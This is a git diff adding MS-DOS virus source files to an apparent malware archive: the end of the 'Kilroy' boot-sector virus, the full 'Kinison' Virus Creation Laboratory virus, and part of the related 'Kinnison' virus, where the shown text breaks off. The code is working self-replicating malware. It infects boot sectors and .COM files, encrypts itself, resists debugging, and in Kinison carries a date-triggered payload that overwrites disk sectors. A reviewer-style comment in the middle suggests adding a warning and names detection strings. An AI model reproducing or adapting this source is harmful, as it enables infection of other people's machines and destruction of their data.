3=1024) + DB 12H ;Last sector number (we make it large enough to handle 1.2/1.44 MB floppies) + DB 0 ;Gap length between sectors for r/w operations, in bytes + DB 0 ;Data transfer length when sector length not specified + DB 0 ;Gap length between sectors for format operations, in bytes + DB 0 ;Value stored in newly formatted sectors + DB 1 ;Head settle time, in milliseconds (we set it small to speed operations) + DB 0 ;Motor startup time, in 1/8 seconds + +HEAD: DB 0 ;Current head to read from (scratch area used by boot sector) + +;Here is the start of the boot sector code + +BOOT: CLI ;interrupts off + XOR AX,AX ;prepare to set up segments + MOV ES,AX ;set ES=0 + MOV SS,AX ;start stack at 0000:7C00 + MOV SP,OFFSET BOOTSEC + MOV BX,1EH*4 ;get address of disk + LDS SI,SS:[BX] ;param table in ds:si + PUSH 
DS + PUSH SI ;save that address + PUSH SS + PUSH BX ;and its address + + MOV DI,OFFSET DSKBASETBL ;and update default + MOV CX,11 ;values to the table stored here + CLD ;direction flag cleared +DFLT1: LODSB + CMP BYTE PTR ES:[DI],0 ;anything non-zero + JNZ SHORT DFLT2 ;is not a default, so don't save it + STOSB ;else put default value in place + JMP SHORT DFLT3 ;and go on to next +DFLT2: INC DI +DFLT3: LOOP DFLT1 ;and loop until cx=0 + + MOV AL,AH ;set ax=0 + MOV DS,AX ;set ds=0 so we can set disk tbl + MOV WORD PTR [BX+2],AX ;to @DSKBASETBL (ax=0 here) + MOV WORD PTR [BX],OFFSET DSKBASETBL ;ok, done + STI ;now turn interrupts on + INT 13H ;and reset disk drive system +ERROR1: JC ERROR1 ;if an error, hang the machine + +;Attempt to self reproduce. If this boot sector is located on drive A, it will +;attempt to relocate to drive C. If successful, it will stop, otherwise it will +;attempt to relocate to drive B. If this boot sector is located on drive C, it +;will attempt to relocate to drive B. +SPREAD: + CALL DISP_MSG ;Display the "Kilroy was here!" 
message + MOV BX,OFFSET DISK_BUF ;read other boot sectors into this buffer + CMP BYTE PTR [DRIVE],80H + JZ SPREAD2 ;if it's C, go try to spread to B + MOV DX,180H ;if it's A, try to spread to C first, try Head 1 + CMP BYTE PTR [HD_COUNT],0 ;see if there is a hard drive + JZ SPREAD2 ;none - try floppy B + MOV CX,1 ;read Track 0, Sector 1 + MOV AX,201H + INT 13H + JC SPREAD2 ;on error, go try drive B + CMP WORD PTR [NEW_ID],0AA55H ;make sure it really is a boot sector + JNZ SPREAD2 + CALL MOVE_DATA + MOV DX,180H ;and go write the new sector + MOV CX,1 + MOV AX,301H + INT 13H + JC SPREAD2 ;if an error writing to C:, try infecting B: + JMP SHORT LOOK_SYS ;if no error, go look for system files +SPREAD2: MOV AL,BYTE PTR [SYSTEM_INFO] ;first see if there is a B drive + AND AL,0C0H + ROL AL,1 ;put bits 6 & 7 into bits 0 & 1 + ROL AL,1 + INC AL ;add one, so now AL=# of drives + CMP AL,2 + JC LOOK_SYS ;no B drive, just quit + MOV DX,1 ;read drive B + MOV AX,201H ;read one sector + MOV CX,1 ;read Track 0, Sector 1 + INT 13H + JC LOOK_SYS ;if an error here, just exit + CMP WORD PTR [NEW_ID],0AA55H ;make sure it really is a boot sector + JNZ LOOK_SYS ;no, don't attempt reproduction + CALL MOVE_DATA ;yes, move this boot sector in place + MOV DX,1 + MOV AX,301H ;and write this boot sector to drive B + MOV CX,1 + INT 13H + +;Here we look at the first file on the disk to see if it is the first MS-DOS or +;PC-DOS system file, IO.SYS or IBMBIO.COM, respectively. 
+LOOK_SYS: + MOV AL,BYTE PTR [FAT_COUNT] ;get fats per disk + XOR AH,AH + MUL WORD PTR [SECS_PER_FAT] ;multiply by sectors per fat + ADD AX,WORD PTR [HIDDEN_SECS] ;add hidden sectors + ADD AX,WORD PTR [FAT_START] ;add starting fat sector + + PUSH AX + MOV WORD PTR [DOS_ID],AX ;root dir, save it + + MOV AX,20H ;dir entry size + MUL WORD PTR [ROOT_ENTRIES] ;dir size in ax + MOV BX,WORD PTR [SEC_SIZE] ;sector size + ADD AX,BX ;add one sector + DEC AX ;decrement by 1 + DIV BX ;ax=# sectors in root dir + ADD WORD PTR [DOS_ID],AX ;DOS_ID=start of data + MOV BX,OFFSET DISK_BUF ;set up disk read buffer at 0000:0500 + POP AX + CALL CONVERT ;and go convert sequential sector number to bios data + MOV AL,1 ;prepare for a disk read for 1 sector + CALL READ_DISK ;go read it + + MOV DI,BX ;compare first file on disk with + MOV CX,11 ;required file name + MOV SI,OFFSET SYSFILE_1 ;of first system file for PC DOS + REPZ CMPSB + JZ SYSTEM_THERE ;ok, found it, go load it + + MOV DI,BX ;compare first file with + MOV CX,11 ;required file name + MOV SI,OFFSET SYSFILE_2 ;of first system file for MS DOS + REPZ CMPSB +ERROR2: JNZ ERROR2 ;not the same - an error, so hang the machine + +;Ok, system file is there, so load it +SYSTEM_THERE: + MOV AX,WORD PTR [DISK_BUF+1CH] ;get file size of IBMBIO.COM/IO.SYS + XOR DX,DX + DIV WORD PTR [SEC_SIZE] ;and divide by sector size + INC AL ;ax=number of sectors to read + MOV BP,AX ;store that number in BP + MOV AX,WORD PTR [DOS_ID] ;get sector number of start of data + PUSH AX + MOV BX,700H ;set disk read buffer to 0000:0700 +RD_BOOT1: MOV AX,WORD PTR [DOS_ID] ;and get sector to read + CALL CONVERT ;convert to bios Trk/Cyl/Sec info + MOV AL,1 ;read one sector + CALL READ_DISK ;go read the disk + SUB BP,1 ;subtract 1 from number of sectors to read + JZ DO_BOOT ;and quit if we're done + ADD WORD PTR [DOS_ID],1 ;add sectors read to sector to read + ADD BX,WORD PTR [SEC_SIZE] ;and update buffer address + JMP RD_BOOT1 ;then go for another + + +;Ok, the first 
system file has been read in, now transfer control to it +DO_BOOT: + MOV CH,BYTE PTR [DISK_ID] ;Put drive type in ch + MOV DL,BYTE PTR [DRIVE] ;Drive number in dl + POP BX +; JMP FAR PTR LOAD ;use the nicer far jump if compiling with MASM or TASM + MOV AX,0070H ;A86 is too stupid to handle that, + PUSH AX ;so let's fool it with a far return + XOR AX,AX + PUSH AX + RETF + + +;Convert sequential sector number in ax to BIOS Track, Head, Sector information. +;Save track number in DX, sector number in CH, +CONVERT: + XOR DX,DX + DIV WORD PTR [SECS_PER_TRK] ;divide ax by sectors per track + INC DL ;dl=sector number to start read on, al=track/head count + MOV CH,DL ;save it here + XOR DX,DX + DIV WORD PTR [HEADS] ;divide ax by head count + MOV BYTE PTR [HEAD],DL ;dl=head number, save it + MOV DX,AX ;ax=track number, save it in dx + RET + + +;Read the disk for the number of sectors in al, into the buffer es:bx, using +;the track number in DX, the head number at HEAD, and the sector +;number at CH. +READ_DISK: + MOV AH,2 ;read disk command + MOV CL,6 ;shift possible upper 2 bits of track number to + SHL DH,CL ;the high bits in dh + OR DH,CH ;and put sector number in the low 6 bits + MOV CX,DX + XCHG CH,CL ;ch (0-5) = sector, cl, ch (6-7) = track + MOV DL,BYTE PTR [DRIVE] ;get drive number from here + MOV DH,BYTE PTR [HEAD] ;and head number from here + INT 13H ;go read the disk +ERROR3: JC ERROR3 ;hang in case of an error + RET + +;Move data that doesn't change from this boot sector to the one read in at +;DISK_BUF. That includes everything but the DRIVE ID (at offset 7DFDH) and +;the data area at the beginning of the boot sector. 
+MOVE_DATA: + MOV SI,OFFSET DSKBASETBL ;Move all of the boot sector code after the data area + MOV DI,OFFSET DISK_BUF + (OFFSET DSKBASETBL - OFFSET BOOTSEC) + MOV CX,OFFSET DRIVE - OFFSET DSKBASETBL + REP MOVSB + MOV SI,OFFSET BOOTSEC ;Move the initial jump and the sector ID + MOV DI,OFFSET DISK_BUF + MOV CX,11 + REP MOVSB + RET + +;Display the null terminated string at MESSAGE. +DISP_MSG: + MOV SI,OFFSET MESSAGE ;set offset of message up +DM1: MOV AH,0EH ;Execute BIOS INT 10H, Fctn 0EH (Display Char) + LODSB ;get character to display + OR AL,AL + JZ DM2 ;repeat until 0 + INT 10H ;display it + JMP SHORT DM1 ;and get another +DM2: RET + + +SYSFILE_1: DB 'IBMBIO COM' ;PC DOS System file +SYSFILE_2: DB 'IO SYS' ;MS DOS System file +MESSAGE: DB 'Kilroy was here!',0DH,0AH,0AH,0 + + ORG 7DFDH + +DRIVE: DB 0 ;Disk drive (A or C) for this sector + +BOOT_ID: DW 0AA55H ;Boot sector ID word + + +MAIN ENDS + + + END START + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.kinison.asm b/MSDOS/Virus.MSDOS.Unknown.kinison.asm new file mode 100644 index 00000000..8bd577a8 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.kinison.asm 
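Review bot: The header comment says the sector "will infect other disks" but does not state what that costs the host, which an archive entry should make explicit: at `SPREAD` the code writes itself to the first hard disk (`MOV DX,180H` / `MOV AX,301H` / `INT 13H`) and, failing that, to drive B (`MOV DX,1` / `MOV AX,301H`), and every error path hangs the machine (`ERROR1: JC ERROR1`, `ERROR2: JNZ ERROR2`, `ERROR3: JC ERROR3`). A one-line note near the top, e.g. `;WARNING: booting this sector overwrites the boot sector of other attached drives; only boot it in an isolated VM with throw-away disk images`, would prevent accidental damage when someone assembles it for study. For identification, the fixed OEM-ID `DOS_ID: DB 'KILROY '` at 7C03H and the `MESSAGE: DB 'Kilroy was here!'` string are the stable indicators a scanner or analyst can look for, and the header could name them as such.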
@@ -0,0 +1,420 @@ +; KINISON.ASM -- Sam Kinsion Virus +; Created with Nowhere Man's Virus Creation Laboratory v1.00 +; Written by Nowhere Man + +virus_type equ 0 ; Appending Virus +is_encrypted equ 1 ; We're encrypted +tsr_virus equ 0 ; We're not TSR + +code segment byte public + assume cs:code,ds:code,es:code,ss:code + org 0100h + +main proc near + db 0E9h,00h,00h ; Near jump (for compatibility) +start: call find_offset ; Like a PUSH IP +find_offset: pop bp ; BP holds old IP + sub bp,offset find_offset ; Adjust for length of host + + call encrypt_decrypt ; Decrypt the virus + +start_of_code label near + + lea si,[bp + buffer] ; SI points to original start + mov di,0100h ; Push 0100h on to stack for + push di ; return to main program + movsw ; Copy the first two bytes + movsb ; Copy the third byte + + mov di,bp ; DI points to start of virus + + mov bp,sp ; BP points to stack + sub sp,128 ; Allocate 128 bytes on stack + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address on stack + + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer on stack + int 021h + +stop_tracing: mov cx,09EBh + mov ax,0FE05h ; Acutal move, plus a HaLT + jmp $-2 + add ah,03Bh ; AH now equals 025h + jmp $-10 ; Execute the HaLT + lea bx,[di + null_vector] ; BX points to new routine + push cs ; Transfer CS into ES + pop es ; using a PUSH/POP + int 021h + mov al,1 ; Disable interrupt 1, too + int 021h + jmp short skip_null ; Hop over the loop +null_vector: jmp $ ; An infinite loop +skip_null: mov byte ptr [di + lock_keys + 1],130 ; Prefetch unchanged +lock_keys: mov al,128 ; Change here screws DEBUG + out 021h,al ; If tracing then lock keyboard + + call get_day + cmp ax,000Bh ; Did the function return 11? + jne skip00 ; If not equal, skip effect + call get_weekday + cmp ax,0005h ; Did the function return 5? 
+ jne skip00 ; If not equal, skip effect + jmp short strt00 ; Success -- skip jump +skip00: jmp end00 ; Skip the routine +strt00: lea si,[di + data00] ; SI points to data + mov ah,0Eh ; BIOS display char. function +display_loop: lodsb ; Load the next char. into AL + or al,al ; Is the character a null? + je disp_strnend ; If it is, exit + int 010h ; BIOS video interrupt + jmp short display_loop ; Do the next character +disp_strnend: + +end00: xor ah,ah ; BIOS get time function + int 01Ah + xchg dx,ax ; AX holds clock ticks + mov cx,0003h ; We'll divide by 3 + cwd ; Sign-extend AX into DX:AX + div cx ; Divide AX by CX + or dx,dx ; Is there a remaindier? + jne no_infection ; If there is then don't spread + call search_files ; Find and infect a file +no_infection: + call get_day + cmp ax,000Bh ; Did the function return 11? + jne skip01 ; If not equal, skip effect + call get_weekday + cmp ax,0005h ; Did the function return 5? + jne skip01 ; If not equal, skip effect + jmp short strt01 ; Success -- skip jump +skip01: jmp end01 ; Skip the routine +strt01: mov ax,0004h ; First argument is 4 + mov cx,0010h ; Second argument is 16 + cli ; Disable interrupts (no Ctrl-C) + cwd ; Clear DX (start with sector 0) +trash_loop: int 026h ; DOS absolute write interrupt + dec ax ; Select the previous disk + cmp ax,-1 ; Have we gone too far? 
+ jne trash_loop ; If not, repeat with new drive + sti ; Restore interrupts + +end01: +com_end: pop dx ; DX holds original DTA address + mov ah,01Ah ; DOS set DTA function + int 021h + + mov sp,bp ; Deallocate local buffer + + xor ax,ax ; + mov bx,ax ; + mov cx,ax ; + mov dx,ax ; Empty out the registers + mov si,ax ; + mov di,ax ; + mov bp,ax ; + + ret ; Return to original program +main endp + + + db 09Ch,054h,068h,09Eh,06Ch + +search_files proc near + push bp ; Save BP + mov bp,sp ; BP points to local buffer + sub sp,64 ; Allocate 64 bytes on stack + + mov ah,047h ; DOS get current dir function + xor dl,dl ; DL holds drive # (current) + lea si,[bp - 64] ; SI points to 64-byte buffer + int 021h + + mov ah,03Bh ; DOS change directory function + lea dx,[di + root] ; DX points to root directory + int 021h + + call traverse ; Start the traversal + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 64] ; DX points to old directory + int 021h + + mov sp,bp ; Restore old stack pointer + pop bp ; Restore BP + ret ; Return to caller + +root db "\",0 ; Root directory +search_files endp + +traverse proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first function + mov cx,00010000b ; CX holds search attributes + lea dx,[di + all_files] ; DX points to "*.*" + int 021h + jc leave_traverse ; Leave if no files present + +check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory? + jne another_dir ; If not, try again + cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."? 
+ je another_dir ;If so, keep going + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 98] ; DX points to new directory + int 021h + + call traverse ; Recursively call ourself + + pushf ; Save the flags + mov ah,03Bh ; DOS change directory function + lea dx,[di + up_dir] ; DX points to parent directory + int 021h + popf ; Restore the flags + + jnc done_searching ; If we infected then exit + +another_dir: mov ah,04Fh ; DOS find next function + int 021h + jnc check_dir ; If found check the file + +leave_traverse: + lea dx,[di + com_mask] ; DX points to "*.COM" + call find_files ; Try to infect a file +done_searching: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller + +up_dir db "..",0 ; Parent directory name +all_files db "*.*",0 ; Directories to search for +com_mask db "*.COM",0 ; Mask for all .COM files +traverse endp + + db 083h,01Dh,064h,0E6h,08Ah + + +find_files proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + push dx ; Save file mask + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first file function + mov cx,00100111b ; CX holds all file attributes + pop dx ; Restore file mask +find_a_file: int 021h + jc done_finding ; Exit if no files found + call infect_file ; Infect the file! 
+ jnc done_finding ; Exit if no error
+ mov ah,04Fh ; DOS find next file function
+ jmp short find_a_file ; Try finding another file
+
+done_finding: mov sp,bp ; Restore old stack frame
+ mov ah,01Ah ; DOS set DTA function
+ pop dx ; Retrieve old DTA address
+ int 021h
+
+ pop bp ; Restore BP
+ ret ; Return to caller
+find_files endp
+
+ db 039h,01Ch,0DDh,0C2h,0DDh
+
+infect_file proc near
+ mov ah,02Fh ; DOS get DTA address function
+ int 021h
+ mov si,bx ; SI points to the DTA
+
+ mov byte ptr [di + set_carry],0 ; Assume we'll fail
+
+ cmp word ptr [si + 01Ah],(65279 - (finish - start))
+ jbe size_ok ; If it's small enough continue
+ jmp infection_done ; Otherwise exit
+
+size_ok: mov ax,03D00h ; DOS open file function, r/o
+ lea dx,[si + 01Eh] ; DX points to file name
+ int 021h
+ xchg bx,ax ; BX holds file handle
+
+ mov ah,03Fh ; DOS read from file function
+ mov cx,3 ; CX holds bytes to read (3)
+ lea dx,[di + buffer] ; DX points to buffer
+ int 021h
+
+ mov ax,04202h ; DOS file seek function, EOF
+ cwd ; Zero DX _ Zero bytes from end
+ mov cx,dx ; Zero CX /
+ int 021h
+
+ xchg dx,ax ; Faster than a PUSH AX
+ mov ah,03Eh ; DOS close file function
+ int 021h
+ xchg dx,ax ; Faster than a POP AX
+
+ sub ax,finish - start + 3 ; Adjust AX for a valid jump
+ cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet?
+ je infection_done ; If equal then exit
+ mov byte ptr [di + set_carry],1 ; Success -- the file is OK
+ add ax,finish - start ; Re-adjust to make the jump
+ mov word ptr [di + new_jump + 1],ax ; Construct jump
+
+ mov ax,04301h ; DOS set file attrib. function
+ xor cx,cx ; Clear all attributes
+ lea dx,[si + 01Eh] ; DX points to victim's name
+ int 021h
+
+ mov ax,03D02h ; DOS open file function, r/w
+ int 021h
+ xchg bx,ax ; BX holds file handle
+
+ mov ah,040h ; DOS write to file function
+ mov cx,3 ; CX holds bytes to write (3)
+ lea dx,[di + new_jump] ; DX points to the jump we made
+ int 021h
+
+ mov ax,04202h ; DOS file seek function, EOF
+ cwd ; Zero DX _ Zero bytes from end
+ mov cx,dx ; Zero CX /
+ int 021h
+
+ push si ; Save SI through call
+ call encrypt_code ; Write an encrypted copy
+ pop si ; Restore SI
+
+ mov ax,05701h ; DOS set file time function
+ mov cx,[si + 016h] ; CX holds old file time
+ mov dx,[si + 018h] ; DX holds old file date
+ int 021h
+
+ mov ah,03Eh ; DOS close file function
+ int 021h
+
+ mov ax,04301h ; DOS set file attrib. function
+ xor ch,ch ; Clear CH for file attribute
+ mov cl,[si + 015h] ; CX holds file's old attributes
+ lea dx,[si + 01Eh] ; DX points to victim's name
+ int 021h
+
+infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed
+ ret ; Return to caller
+
+set_carry db ? ; Set-carry-on-exit flag
+buffer db 090h,0CDh,020h ; Buffer to hold old three bytes
+new_jump db 0E9h,?,? ; New jump to virus
+infect_file endp
+
+
+ db 087h,04Ch,0B3h,047h,001h
+
+get_day proc near
+ mov ah,02Ah ; DOS get date function
+ int 021h
+ mov al,dl ; Copy day into AL
+ cbw ; Sign-extend AL into AX
+ ret ; Return to caller
+get_day endp
+
+ db 0FFh,024h,0C3h,092h,07Fh
+
+get_weekday proc near
+ mov ah,02Ah ; DOS get date function
+ int 021h
+ cbw ; Sign-extend AL into AX
+ ret ; Return to caller
+get_weekday endp
+
+data00 db 7,7,7,"DIE BITCH!!!!! AHHHHHHHH!!!!!!!",13,10,0
+
+vcl_marker db "[VCL]",0 ; VCL creation marker
+
+
+note db "This *VIRUS* is dedecated to t"
+ db "he memory of Sam Kinsion, 1954"
+ db "-1992",0
+ db "[Kinison]",0
+ db "Nowhere Man, [NuKE] '92",0
+
+encrypt_code proc near
+ push bp ; Save BP
+ mov bp,di ; Use BP as pointer to code
+ lea si,[bp + encrypt_decrypt]; SI points to cipher routine
+
+ xor ah,ah ; BIOS get time function
+ int 01Ah
+ mov word ptr [si + 9],dx ; Low word of timer is new key
+
+ xor byte ptr [si + 1],8 ;
+ xor byte ptr [si + 8],1 ; Change all SIs to DIs
+ xor word ptr [si + 11],0101h; (and vice-versa)
+
+ lea di,[bp + finish] ; Copy routine into heap
+ mov cx,finish - encrypt_decrypt - 1 ; All but final RET
+ push si ; Save SI for later
+ push cx ; Save CX for later
+ rep movsb ; Copy the bytes
+
+ lea si,[bp + write_stuff] ; SI points to write stuff
+ mov cx,5 ; CX holds length of write
+ rep movsb ; Copy the bytes
+
+ pop cx ; Restore CX
+ pop si ; Restore SI
+ inc cx ; Copy the RET also this time
+ rep movsb ; Copy the routine again
+
+ mov ah,040h ; DOS write to file function
+ lea dx,[bp + start] ; DX points to virus
+
+ lea si,[bp + finish] ; SI points to routine
+ call si ; Encrypt/write/decrypt
+
+ mov di,bp ; DI points to virus again
+ pop bp ; Restore BP
+ ret ; Return to caller
+
+write_stuff: mov cx,finish - start ; Length of code
+ int 021h
+encrypt_code endp
+
+end_of_code label near
+
+encrypt_decrypt proc near
+ lea si,[bp + start_of_code] ; SI points to code to decrypt
+ mov cx,(end_of_code - start_of_code) / 2 ; CX holds length
+xor_loop: db 081h,034h,00h,00h ; XOR a word by the key
+ inc si ; Do the next word
+ inc si ;
+ loop xor_loop ; Loop until we're through
+ ret ; Return to caller
+encrypt_decrypt endp
+finish label near
+
+code ends
+ end main
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.kinnison.asm b/MSDOS/Virus.MSDOS.Unknown.kinnison.asm
new file mode 100644
index 00000000..21007ef2
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.kinnison.asm 
@@ -0,0 +1,397 @@
+; KINNISON.ASM -- Sam Kinnison virus
+; Created by Nowhere Man's Virus Creation Labratory v0.75
+; Written by Nowhere Man
+
+virus_type equ 0
+
+code segment 'CODE'
+ assume cs:code,ds:code,es:code,ss:code
+ org 0100h
+
+main proc near
+flag: mov ah,0
+ nop
+ nop
+
+ jmp start ; Would be at start of victim
+ nop
+ nop
+start: call find_offset ; Push IP on to stack, advance IP
+find_offset: pop di ; DI holds old IP
+ sub di,3 ; Adjust for length of CALL
+
+ lea si,[di + start_of_code - start] ; SI points to code
+ call encrypt_decrypt ; Decrypt the code
+
+start_of_code label near
+
+ push di ; Save DI
+ mov si,offset flag ; SI points to flag bytes
+ lea di,[di + new_jump - start] ; DI points to start of jump
+ movsw ; Transfer two bytes
+ movsw ; Transfer two bytes
+ pop di ; Restore DI
+ push di ; And save it for later
+ lea si,[di + buffer - start]; SI points to old start
+ mov di,0100h ; DI points to start of code
+ movsw ; Transfer two bytes
+ movsw ; Transfer two bytes
+ movsw ; Transfer two bytes
+ movsb ; Transfer final byte
+ pop di ; Restore DI
+
+ mov bp,sp ; BP points to stack
+ sub sp,128 ; Allocate 128 bytes on stack
+
+ mov ah,02Fh ; DOS get DTA function
+ int 021h
+ push bx ; Save old DTA address on stack
+
+ mov ah,01Ah ; DOS set DTA function
+ lea dx,[bp - 128] ; DX points to buffer on stack
+ int 021h
+
+ call get_day
+ cmp ax,000Bh
+ jne end00
+ call get_weekday
+ cmp ax,0005h
+ jne end00
+ mov cx,0003h
+ call beep
+end00: xor ah,ah ; BIOS get time function
+ int 01Ah
+ test dx,0001h
+ jne no_infection
+ call search_files
+no_infection:
+ call get_day
+ cmp ax,000Bh
+ jne end01
+ call get_weekday
+ cmp ax,0005h
+ jne end01
+ lea si,[di + data00 - start] ; SI points to data
+ call display_string
+end01: pop dx ; DX holds original DTA address
+ mov ah,01Ah ; DOS set DTA function
+ int 021h
+
+ mov sp,bp ; Deallocate local buffer
+
+ mov di,0100h ; Push 0100h on to stack for
+ push di ; return to main program
+
+ xor ax,ax ;
+ mov bx,ax ;
+ mov cx,ax ;
+ mov dx,ax ; Empty out the registers
+ mov si,ax ;
+ mov di,ax ;
+ mov bp,ax ;
+
+ ret ; Return to original program
+main endp
+
+search_files proc near
+ push bp ; Save BP
+ mov bp,sp ; BP points to local buffer
+ sub sp,64 ; Allocate 64 bytes on stack
+
+ mov ah,047h ; DOS get current dir function
+ xor dl,dl ; DL holds drive # (current)
+ lea si,[bp - 64] ; SI points to 64-byte buffer
+ int 021h
+
+ mov ah,03Bh ; DOS change directory function
+ lea dx,[di + root - start] ; DX points to root directory
+ int 021h
+
+ call traverse ; Start the traversal
+
+ mov ah,03Bh ; DOS change directory function
+ lea dx,[bp - 64] ; DX points to old directory
+ int 021h
+
+ mov sp,bp ; Restore old stack pointer
+ pop bp ; Restore BP
+ ret ; Return to caller
+
+root db "\",0 ; Root directory
+search_files endp
+
+traverse proc near
+ push bp ; Save BP
+
+ mov ah,02Fh ; DOS get DTA function
+ int 021h
+ push bx ; Save old DTA address
+
+ mov bp,sp ; BP points to local buffer
+ sub sp,128 ; Allocate 128 bytes on stack
+
+ mov ah,01Ah ; DOS set DTA function
+ lea dx,[bp - 128] ; DX points to buffer
+ int 021h
+
+ mov ah,04Eh ; DOS find first function
+ mov cx,00010000b ; CX holds search attributes
+ mov dx,offset all_files ; DX points to "*.*"
+ int 021h
+ jc leave_traverse ; Leave if no files present
+
+check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory?
+ jne another_dir ; If not, try again
+ cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."?
+ je another_dir ;If so, keep going
+
+ mov ah,03Bh ; DOS change directory function
+ lea dx,[bp - 98] ; DX points to new directory
+ int 021h
+
+ call traverse ; Recursively call ourself
+
+ mov ah,03Bh ; DOS change directory function
+ lea dx,[di + up_dir - start]; DX points to parent directory
+ int 021h
+
+another_dir: mov ah,04Fh ; DOS find next function
+ int 021h
+ jnc check_dir ; If found check the file
+
+leave_traverse:
+ lea dx,[di + com_mask - start] ; DX points to "*.COM"
+ call find_files ; Try to infect a file
+done_searching: mov sp,bp ; Restore old stack frame
+ mov ah,01Ah ; DOS set DTA function
+ pop dx ; Retrieve old DTA address
+ int 021h
+
+ pop bp ; Restore BP
+ ret ; Return to caller
+
+up_dir db "..",0 ; Parent directory name
+all_files db "*.*",0 ; Directories to search for
+com_mask db "*.COM",0 ; Mask for all .COM files
+traverse endp
+
+find_files proc near
+ push bp ; Save BP
+
+ mov ah,02Fh ; DOS get DTA function
+ int 021h
+ push bx ; Save old DTA address
+
+ mov bp,sp ; BP points to local buffer
+ sub sp,128 ; Allocate 128 bytes on stack
+
+ push dx ; Save file mask
+ mov ah,01Ah ; DOS set DTA function
+ lea dx,[bp - 128] ; DX points to buffer
+ int 021h
+
+ mov ah,04Eh ; DOS find first file function
+ mov cx,00100111b ; CX holds all file attributes
+ pop dx ; Restore file mask
+find_a_file: int 021h
+ jc done_finding ; Exit if no files found
+ call infect_file ; Infect the file!
+ jnc done_finding ; Exit if no error
+ mov ah,04Fh ; DOS find next file function
+ jmp short find_a_file ; Try finding another file
+
+done_finding: mov sp,bp ; Restore old stack frame
+ mov ah,01Ah ; DOS set DTA function
+ pop dx ; Retrieve old DTA address
+ int 021h
+
+ pop bp ; Restore BP
+ ret ; Return to caller
+find_files endp
+
+infect_file proc near
+ mov ah,02Fh ; DOS get DTA address function
+ int 021h
+ mov si,bx ; SI points to the DTA
+
+ mov ax,04301h ; DOS set file attributes function
+ xor cx,cx ; Clear all attributes
+ lea dx,[si + 01Eh] ; DX points to victim's name
+ int 021h
+
+ mov ax,03D02h ; DOS open file function, r/w
+ int 021h
+ xchg bx,ax ; BX holds file handle
+
+ mov ah,03Fh ; DOS read from file function
+ mov cx,7 ; CX holds bytes to read (7)
+ lea dx,[di + buffer - start]; DX points to buffer
+ int 021h
+
+ push si ; Save DTA address before compare
+ mov byte ptr [di + set_carry - start],0 ; Assume we'll fail
+ lea si,[di + buffer - start]; SI points to comparison buffer
+ push di ; Save virus offset
+ lea di,[di + new_jump - start] ; DI points to virus flag
+ mov cx,4 ; CX holds number of bytes (4)
+ rep cmpsb ; Compare the first four bytes
+ pop di ; Restore DI
+ je close_it_up ; If equal then close up
+ mov byte ptr [di + set_carry - start],1 ; Success -- the file is OK
+
+ cwd ; Zero CX _ Zero bytes from start
+ mov cx,dx ; Zero DX /
+ mov ax,04200h ; DOS file seek function, start
+ int 021h
+
+ mov ax,04202h ; DOS file seek function, EOF
+ cwd ; Zero DX _ Zero bytes from end
+ mov cx,dx ; Zero CX /
+ int 021h
+
+ sub ax,7 ; Prepare for JMP
+ mov word ptr [di + new_jump + 5 - start],ax ; Construct JMP for later
+
+ call encrypt_code ; Make an encrypted copy of ourself
+
+ mov ah,040h ; DOS write to file function
+ mov cx,finish - start ; CX holds virus length
+ lea dx,[di + finish - start] ; DX points to encrypted copy
+ int 021h
+
+ cwd ; Zero DX _ Zero bytes from start
+ mov cx,dx ; Zero CX /
+ mov ax,04200h ; DOS file seek function, start
+ int 021h
+
+ mov ah,040h ; DOS write to file function
+ mov cx,7 ; CX holds bytes to write (7)
+ lea dx,[di + new_jump - start] ; DX points to the jump we made
+ int 021h
+
+close_it_up: pop si ; Restore DTA address
+
+ mov ax,05701h ; DOS set file time function
+ mov cx,[si + 016h] ; CX holds old file time
+ mov dx,[si + 018h] ; DX holds old file date
+ int 021h
+
+ mov ah,03Eh ; DOS close file function
+ int 021h
+
+ mov ax,04301h ; DOS set file attributes function
+ xor ch,ch ; Clear CH for file attribute
+ mov cl,[si + 015h] ; CX holds file's old attributes
+ lea dx,[si + 01Eh] ; DX points to victim's name
+ int 021h
+
+infection_done: cmp byte ptr [di + set_carry - start],1 ; Set carry flag if failed
+ ret ; Return to caller
+
+set_carry db ? ; Set-carry-on-exit flag
+buffer db 5 dup (090h),0CDh,020h ; Buffer to hold test data
+new_jump db 4 dup (?),0E9h,?,? ; New jump to virus
+infect_file endp
+
+
+beep proc near
+ jcxz beep_end ; Exit if there are no beeps
+
+ mov ax,0E07h ; BIOS display char., BEL
+beep_loop: int 010h ; Beep
+ loop beep_loop ; Beep until --CX = 0
+
+beep_end: ret ; Return to caller
+beep endp
+
+display_string proc near
+ mov ah,0Eh ; BIOS display char. function
+display_loop: lodsb ; Load the next char. into AL
+ or al,al ; Is the character a null?
+ je disp_strnend ; If it is, exit
+ int 010h ; BIOS video interrupt
+ jmp short display_loop ; Do the next character
+disp_strnend: ret ; Return to caller
+display_string endp
+
+get_day proc near
+ mov ah,02Ah ; DOS get date function
+ int 021h
+ mov al,dl ; Copy day into AL
+ cbw ; Sign-extend AL into AX
+ ret ; Return to caller
